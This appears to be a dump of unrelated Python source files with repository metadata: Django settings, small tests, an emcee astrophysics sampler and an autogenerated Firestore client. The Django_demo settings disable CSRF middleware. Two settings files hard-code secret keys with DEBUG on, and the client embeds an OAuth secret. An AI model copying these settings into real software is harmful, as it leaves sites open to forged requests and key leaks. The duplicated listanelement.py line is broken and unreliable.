DJANGO_POSTEROUS_BLOG_MODEL = 'Entry' # The model where the blog posts are stored
DJANGO_POSTEROUS_TITLE_FIELD = 'title' # The name of the title field within your blog model
DJANGO_POSTEROUS_BODY_FIELD = 'body_html' # The name of the field where your post will be stored
DJANGO_POSTEROUS_DATE_FIELD = 'pub_date' # The name of the field where the date of the post will be stored
DJANGO_POSTEROUS_AUTHOR_FIELD = 'author' # The name of the field where the author of the post will be stored
##############################################################################
# Django-storages
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
if USE_STATICFILES:
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE
AWS_QUERYSTRING_AUTH = False
AWS_HEADERS = {
'Cache-Control': 'max-age=3600',
}
try:
from local_settings import *
except ImportError:
pass
|
[
"markwayneliu@gmail.com"
] |
markwayneliu@gmail.com
|
7b1bd474762dbf9fa0ad77e916a9a288222c806a
|
44494598f8edcee0319f3b4ef69b704fbf6d88f2
|
/code/twurtle/src/TestDCMotorRobot.py
|
aad26a3b8a287a62bb2e513d1e4b4b865f1e0879
|
[] |
no_license
|
whaleygeek/pyws
|
3cebd7e88b41e14d9c1e4dbb8148de63dadbdd57
|
e60724646e49287f1e12af609f325ac228b31512
|
refs/heads/master
| 2021-01-02T09:01:47.644851
| 2014-09-02T19:47:20
| 2014-09-02T19:47:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
# This is mainly to test that the packaging has worked for robot correctly
import robot
r = robot.MotorRobot(robot.DCMotorDrive(a1=11, a2=12, b1=13, b2=14))
r.test()
|
[
"david@thinkingbinaries.com"
] |
david@thinkingbinaries.com
|
a5f5ad934ab6b4548d185c57b55e75a4fe701d2d
|
75dcb56e318688499bdab789262839e7f58bd4f6
|
/_algorithms_challenges/pybites/bitesofpy-master/!201-300/239/test_fizzbuzz.py
|
374796ea04fb39da68675115964e7be47e23b93c
|
[] |
no_license
|
syurskyi/Algorithms_and_Data_Structure
|
9a1f358577e51e89c862d0f93f373b7f20ddd261
|
929dde1723fb2f54870c8a9badc80fc23e8400d3
|
refs/heads/master
| 2023-02-22T17:55:55.453535
| 2022-12-23T03:15:00
| 2022-12-23T03:15:00
| 226,243,987
| 4
| 1
| null | 2023-02-07T21:01:45
| 2019-12-06T04:14:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 483
|
py
|
from fizzbuzz import fizzbuzz
# write one or more pytest functions below, they need to start with test_
def test_fizzbuzz_base():
assert fizzbuzz(1) == 1
assert fizzbuzz(2) == 2
def test_fizzbuzz_fizz():
assert fizzbuzz(3) == 'Fizz'
assert fizzbuzz(6) == 'Fizz'
def test_fizzbuzz_buzz():
assert fizzbuzz(5) == 'Buzz'
assert fizzbuzz(10) == 'Buzz'
def test_fizzbuzz_fizzbuzz():
assert fizzbuzz(15) == 'Fizz Buzz'
assert fizzbuzz(30) == 'Fizz Buzz'
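# --- Editor's reference sketch: one fizzbuzz.py implementation that would
# satisfy the tests above (note they expect 'Fizz Buzz' with a space at
# multiples of 15):
def fizzbuzz(number):
    if number % 15 == 0:
        return 'Fizz Buzz'
    if number % 3 == 0:
        return 'Fizz'
    if number % 5 == 0:
        return 'Buzz'
    return number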
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
6a0a01d92744efe31045b17e0d9e6e64dba5448a
|
8b2c5420f7e331fb6e48f3efd3cfc8a714291d4d
|
/finances/settings.py
|
7a343222fcdb21fb5e62ad3f6c5589226c6c6412
|
[] |
no_license
|
jjjggg092/finalproject
|
bc297c8b623937f28565591138534c762bf36560
|
1159ca8ae47b364f84586e39176b678c3feb42f9
|
refs/heads/master
| 2021-06-22T12:27:34.707772
| 2019-12-10T23:13:46
| 2019-12-10T23:13:46
| 227,138,704
| 0
| 0
| null | 2021-06-10T22:22:57
| 2019-12-10T14:18:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,124
|
py
|
"""
Django settings for finances project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c1+b$@a%ptdh=4=5i_4*6oa@k3*8+ezwc6__c^o!fszwf1=0gq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'money.apps.MoneyConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'finances.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'finances.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
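# Both SECURITY WARNINGs above can be addressed by reading the values from the
# environment instead of hard-coding them -- a sketch, not part of the original
# file (the variable names DJANGO_SECRET_KEY / DJANGO_DEBUG are placeholders):
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)
DEBUG = os.environ.get('DJANGO_DEBUG', 'true').lower() == 'true'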
# ---- source: godhunter1993/Django :: /Django_demo/settings.py (no license) ----
"""
Django settings for Django_demo project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9anr*r86&2jplaj1i$$!)u1-)1x^4brr85=xcg78d68)i0pu17'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'learn',
'people',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Django_demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Django_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media').replace('\\', '/')  # MEDIA_ROOT is the root directory for uploaded images
MEDIA_URL = '/media/'
# ---- source: joedave1/python :: /listanelement.py (no license) ----
x=input("Enter a commc seperated list values: ").split(",")
color=list(x)
print("The first color is %s and the last color is %s"%(color[0],color[-1]))x=input("Enter a commc seperated list values: ").split(",")
color=list(x)
print("The first color is %s and the last color is %s"%(color[0],color[-1]))
# ---- source: tcallister/BBH-spin-q-correlations :: /code/run_emcee_plPeak_noEvol_no190412.py (no license) ----
import numpy as np
import glob
import emcee as mc
import h5py
import sys
from support import *
from likelihoods import *
# -- Set prior bounds --
priorDict = {
'lmbda':(-5,4),
'mMax':(60,100),
'm0':(20,100),
'sigM':(1,10),
'fPeak':(0,1),
'bq':(-2,10),
'sig_kappa':6.,
'mu':(-1,1),
'log_sigma':(-1.5,0.5),
'mMin':5.
}
# Dicts with samples:
sampleDict = np.load("/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/sampleDict.pickle", allow_pickle=True)  # allow_pickle=True is required to unpickle a dict with modern numpy
sampleDict.pop('S190412m')
mockDetections = h5py.File('/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/o3a_bbhpop_inj_info.hdf','r')
# h5py's Dataset.value attribute was removed in h5py 3.0; [()] reads the full dataset
ifar_1 = mockDetections['injections']['ifar_gstlal'][()]
ifar_2 = mockDetections['injections']['ifar_pycbc_bbh'][()]
ifar_3 = mockDetections['injections']['ifar_pycbc_full'][()]
detected = (ifar_1>1) + (ifar_2>1) + (ifar_3>1)
m1_det = mockDetections['injections']['mass1_source'][()][detected]
m2_det = mockDetections['injections']['mass2_source'][()][detected]
s1z_det = mockDetections['injections']['spin1z'][()][detected]
s2z_det = mockDetections['injections']['spin2z'][()][detected]
z_det = mockDetections['injections']['redshift'][()][detected]
mockDetectionsO1O2 = h5py.File('/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/input/injections_O1O2an_spin.h5','r')
m1_det = np.append(m1_det,mockDetectionsO1O2['mass1_source'])
m2_det = np.append(m2_det,mockDetectionsO1O2['mass2_source'])
s1z_det = np.append(s1z_det,mockDetectionsO1O2['spin1z'])
s2z_det = np.append(s2z_det,mockDetectionsO1O2['spin2z'])
z_det = np.append(z_det,mockDetectionsO1O2['redshift'])
pop_reweight = injection_weights(m1_det,m2_det,s1z_det,s2z_det,z_det,mMin=priorDict['mMin'])
injectionDict = {
'm1':m1_det,
'm2':m2_det,
's1z':s1z_det,
's2z':s2z_det,
'z':z_det,
'weights':pop_reweight
}
nWalkers = 32
output = "/home/thomas.callister/RedshiftDistributions/BBH-spin-q-correlations/code/output/emcee_samples_plPeak_noEvol_no190412"
# Search for existing chains
old_chains = np.sort(glob.glob("{0}_r??.npy".format(output)))
# If no chain already exists, begin a new one
if len(old_chains)==0:
run_version = 0
# Initialize walkers from random positions in mu-sigma2 parameter space
initial_lmbdas = np.random.random(nWalkers)*(-2.)
initial_mMaxs = np.random.random(nWalkers)*20.+80.
initial_m0s = np.random.random(nWalkers)*10.+30
initial_sigMs = np.random.random(nWalkers)*4+1.
initial_fs = np.random.random(nWalkers)
initial_bqs = np.random.random(nWalkers)*2.
initial_ks = np.random.normal(size=nWalkers,loc=0,scale=1)+2.
initial_mus = np.random.random(nWalkers)*0.05
initial_sigmas = np.random.random(nWalkers)*0.5-1.
initial_walkers = np.transpose([initial_lmbdas,initial_mMaxs,initial_m0s,initial_sigMs,initial_fs,initial_bqs,initial_ks,initial_mus,initial_sigmas])
# Otherwise resume existing chain
else:
# Load existing file and iterate run version
old_chain = np.load(old_chains[-1])
run_version = int(old_chains[-1][-6:-4])+1
# Strip off any trailing zeros due to incomplete run
goodInds = np.where(old_chain[0,:,0]!=0.0)[0]
old_chain = old_chain[:,goodInds,:]
# Initialize new walker locations to final locations from old chain
initial_walkers = old_chain[:,-1,:]
print('Initial walkers:')
print(initial_walkers)
# Dimension of parameter space
dim = 9
# Run
nSteps = 10000
sampler = mc.EnsembleSampler(nWalkers,dim,logp_powerLawPeak_noEvol,args=[sampleDict,injectionDict,priorDict],threads=16)
for i,result in enumerate(sampler.sample(initial_walkers,iterations=nSteps)):
if i%10==0:
np.save("{0}_r{1:02d}.npy".format(output,run_version),sampler.chain)
np.save("{0}_r{1:02d}.npy".format(output,run_version),sampler.chain)
# ---- source: iofh/QA-System :: /QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/firestore/v1/firestore_v1_client.py (Apache-2.0) ----
"""Generated client library for firestore version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.firestore.v1 import firestore_v1_messages as messages
class FirestoreV1(base_api.BaseApiClient):
"""Generated client library for service firestore version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://firestore.googleapis.com/'
MTLS_BASE_URL = 'https://firestore.mtls.googleapis.com/'
_PACKAGE = 'firestore'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform', 'https://www.googleapis.com/auth/datastore']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'FirestoreV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new firestore handle."""
url = url or self.BASE_URL
super(FirestoreV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_databases_collectionGroups_fields = self.ProjectsDatabasesCollectionGroupsFieldsService(self)
self.projects_databases_collectionGroups_indexes = self.ProjectsDatabasesCollectionGroupsIndexesService(self)
self.projects_databases_collectionGroups = self.ProjectsDatabasesCollectionGroupsService(self)
self.projects_databases_documents = self.ProjectsDatabasesDocumentsService(self)
self.projects_databases_operations = self.ProjectsDatabasesOperationsService(self)
self.projects_databases = self.ProjectsDatabasesService(self)
self.projects_locations = self.ProjectsLocationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsDatabasesCollectionGroupsFieldsService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups_fields resource."""
_NAME = 'projects_databases_collectionGroups_fields'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsFieldsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the metadata and configuration for a Field.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1Field) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields/{fieldsId}',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.fields.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsGetRequest',
response_type_name='GoogleFirestoreAdminV1Field',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists the field configuration and metadata for this database.
Currently, FirestoreAdmin.ListFields only supports listing fields
that have been explicitly overridden. To issue this query, call
FirestoreAdmin.ListFields with the filter set to
`indexConfig.usesAncestorConfig:false`.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1ListFieldsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.fields.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+parent}/fields',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsListRequest',
response_type_name='GoogleFirestoreAdminV1ListFieldsResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates a field configuration. Currently, field updates apply only to.
single field index configuration. However, calls to
FirestoreAdmin.UpdateField should provide a field mask to avoid
changing any configuration that the caller isn't aware of. The field mask
should be specified as: `{ paths: "index_config" }`.
This call returns a google.longrunning.Operation which may be used to
track the status of the field update. The metadata for
the operation will be the type FieldOperationMetadata.
To configure the default field settings for the database, use
the special `Field` with resource name:
`projects/{project_id}/databases/{database_id}/collectionGroups/__default__/fields/*`.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsFieldsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/fields/{fieldsId}',
http_method='PATCH',
method_id='firestore.projects.databases.collectionGroups.fields.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleFirestoreAdminV1Field',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsFieldsPatchRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
class ProjectsDatabasesCollectionGroupsIndexesService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups_indexes resource."""
_NAME = 'projects_databases_collectionGroups_indexes'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsIndexesService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a composite index. This returns a google.longrunning.Operation.
which may be used to track the status of the creation. The metadata for
the operation will be the type IndexOperationMetadata.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes',
http_method='POST',
method_id='firestore.projects.databases.collectionGroups.indexes.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/indexes',
request_field='googleFirestoreAdminV1Index',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesCreateRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a composite index.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes/{indexesId}',
http_method='DELETE',
method_id='firestore.projects.databases.collectionGroups.indexes.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a composite index.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1Index) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes/{indexesId}',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.indexes.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesGetRequest',
response_type_name='GoogleFirestoreAdminV1Index',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists composite indexes.
Args:
request: (FirestoreProjectsDatabasesCollectionGroupsIndexesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleFirestoreAdminV1ListIndexesResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/collectionGroups/{collectionGroupsId}/indexes',
http_method='GET',
method_id='firestore.projects.databases.collectionGroups.indexes.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1/{+parent}/indexes',
request_field='',
request_type_name='FirestoreProjectsDatabasesCollectionGroupsIndexesListRequest',
response_type_name='GoogleFirestoreAdminV1ListIndexesResponse',
supports_download=False,
)
class ProjectsDatabasesCollectionGroupsService(base_api.BaseApiService):
"""Service class for the projects_databases_collectionGroups resource."""
_NAME = 'projects_databases_collectionGroups'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesCollectionGroupsService, self).__init__(client)
self._upload_configs = {
}
class ProjectsDatabasesDocumentsService(base_api.BaseApiService):
"""Service class for the projects_databases_documents resource."""
_NAME = 'projects_databases_documents'
def __init__(self, client):
super(FirestoreV1.ProjectsDatabasesDocumentsService, self).__init__(client)
self._upload_configs = {
}
def BatchGet(self, request, global_params=None):
r"""Gets multiple documents.
Documents returned by this method are not guaranteed to be returned in the
same order that they were requested.
Args:
request: (FirestoreProjectsDatabasesDocumentsBatchGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BatchGetDocumentsResponse) The response message.
"""
config = self.GetMethodConfig('BatchGet')
return self._RunMethod(
config, request, global_params=global_params)
BatchGet.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:batchGet',
http_method='POST',
method_id='firestore.projects.databases.documents.batchGet',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:batchGet',
request_field='batchGetDocumentsRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsBatchGetRequest',
response_type_name='BatchGetDocumentsResponse',
supports_download=False,
)
def BeginTransaction(self, request, global_params=None):
r"""Starts a new transaction.
Args:
request: (FirestoreProjectsDatabasesDocumentsBeginTransactionRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BeginTransactionResponse) The response message.
"""
config = self.GetMethodConfig('BeginTransaction')
return self._RunMethod(
config, request, global_params=global_params)
BeginTransaction.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:beginTransaction',
http_method='POST',
method_id='firestore.projects.databases.documents.beginTransaction',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:beginTransaction',
request_field='beginTransactionRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsBeginTransactionRequest',
response_type_name='BeginTransactionResponse',
supports_download=False,
)
def Commit(self, request, global_params=None):
r"""Commits a transaction, while optionally updating documents.
Args:
request: (FirestoreProjectsDatabasesDocumentsCommitRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitResponse) The response message.
"""
config = self.GetMethodConfig('Commit')
return self._RunMethod(
config, request, global_params=global_params)
Commit.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents:commit',
http_method='POST',
method_id='firestore.projects.databases.documents.commit',
ordered_params=['database'],
path_params=['database'],
query_params=[],
relative_path='v1/{+database}/documents:commit',
request_field='commitRequest',
request_type_name='FirestoreProjectsDatabasesDocumentsCommitRequest',
response_type_name='CommitResponse',
supports_download=False,
)
def CreateDocument(self, request, global_params=None):
r"""Creates a new document.
Args:
request: (FirestoreProjectsDatabasesDocumentsCreateDocumentRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('CreateDocument')
return self._RunMethod(
config, request, global_params=global_params)
CreateDocument.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{collectionId}',
http_method='POST',
method_id='firestore.projects.databases.documents.createDocument',
ordered_params=['parent', 'collectionId'],
path_params=['collectionId', 'parent'],
query_params=['documentId', 'mask_fieldPaths'],
relative_path='v1/{+parent}/{collectionId}',
request_field='document',
request_type_name='FirestoreProjectsDatabasesDocumentsCreateDocumentRequest',
response_type_name='Document',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='DELETE',
method_id='firestore.projects.databases.documents.delete',
ordered_params=['name'],
path_params=['name'],
query_params=['currentDocument_exists', 'currentDocument_updateTime'],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsDeleteRequest',
response_type_name='Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a single document.
Args:
request: (FirestoreProjectsDatabasesDocumentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Document) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}',
http_method='GET',
method_id='firestore.projects.databases.documents.get',
ordered_params=['name'],
path_params=['name'],
query_params=['mask_fieldPaths', 'readTime', 'transaction'],
relative_path='v1/{+name}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsGetRequest',
response_type_name='Document',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists documents.
Args:
request: (FirestoreProjectsDatabasesDocumentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListDocumentsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}/{collectionId}',
http_method='GET',
method_id='firestore.projects.databases.documents.list',
ordered_params=['parent', 'collectionId'],
path_params=['collectionId', 'parent'],
query_params=['mask_fieldPaths', 'orderBy', 'pageSize', 'pageToken', 'readTime', 'showMissing', 'transaction'],
relative_path='v1/{+parent}/{collectionId}',
request_field='',
request_type_name='FirestoreProjectsDatabasesDocumentsListRequest',
response_type_name='ListDocumentsResponse',
supports_download=False,
)
def ListCollectionIds(self, request, global_params=None):
r"""Lists all the collection IDs underneath a document.
Args:
request: (FirestoreProjectsDatabasesDocumentsListCollectionIdsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ListCollectionIdsResponse) The response message.
"""
config = self.GetMethodConfig('ListCollectionIds')
return self._RunMethod(
config, request, global_params=global_params)
ListCollectionIds.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/databases/{databasesId}/documents/{documentsId}/{documentsId1}:listCollectionIds',
http_method='POST',
method_id='firestore.projects.databases.documents.listCollectionIds',
